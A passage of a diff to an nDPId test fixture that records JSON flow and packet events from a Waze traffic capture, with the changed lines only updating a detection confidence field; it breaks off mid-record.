00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1435587871656,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871656,"pkt":"ABoRAAACABoRAAABCABFAAA8\/jRAAEAGF+wKCAABNubjrLHiAFBcJZMGAAAAAKAC\/\/8UywAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1435587871657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAodJ1AABAG0Zc25uOsCggAAQBQseKj2mz5XCWTB1AS\/\/\/ZAwAA"} @@ -53,10 +53,10 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1435587871658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871658,"pkt":"ABoRAAACABoRAAABCABFAAA8NxhAAEAG3wgKCAABNubjrLHkAFDBi1oqAAAAAKAC\/\/\/oPgAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1435587871659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871659,"pkt":"ABoRAAACABoRAAABCABFAAAodJ5AABAG0ZY25uOsCggAAQBQseQ+dKXVwYtaK1AS\/\/\/ZAQAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1435587871660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871660,"pkt":"ABoRAAACABoRAAABCABFAAAoNxlAAEAG3xsKCAABNubjrLHkAFDBi1orPnSl1lAQ\/\/\/ZAgAA"} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871918,"flow_last_seen":1435587871918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871918,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1435587871918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871918,"pkt":"ABoRAAACABoRAAABCABFAAA8cIlAAEAGqJ4KCAABsCJnacdpAbv69x3BAAAAAKAC\/\/\/XPAAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1435587871929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAAodKhAABAG1JOwImdpCggAAQG7x2kFCOI++vcdwlAS\/\/\/FGAAA"} @@ -77,58 +77,58 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAo\/W1AAEAGG84KCAABsCJnacdrAbsTBZAl7Ppv3FAQ\/\/\/FFwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoxDVAAEAGxaUKCAABNBFy25hiAbudWal9YqZWhFAQ\/\/9kwAAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoRGhAAEAG0cwKCAABNubjrLHqAFALhykw9HjW0VAQ\/\/\/Y\/AAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587872476,"flow_last_seen":1435587872476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587872476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1435587872476,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587872476,"pkt":"ABoRAAACABoRAAABCABFAAA8WSJAAEAGvP4KCAABNubjrLHwAFDxQTSmAAAAAKAC\/\/\/drgAAAgQFtAQCCAoACG2EAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1435587872477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872477,"pkt":"ABoRAAACABoRAAABCABFAAAodLxAABAG0Xg25uOsCggAAQBQsfAOvstZ8UE0p1AS\/\/\/Y9QAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1435587872478,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587872478,"pkt":"ABoRAAACABoRAAABCABFAAAoWSNAAEAGvREKCAABNubjrLHwAFDxQTSnDr7LWlAQ\/\/\/Y9gAA"} -00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":175,"source":"waze.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587872476,"flow_last_seen":1435587872479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587872479,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/langs\/1.0\/lang.portuguese_br?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871935,"flow_last_seen":1435587872515,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587872515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 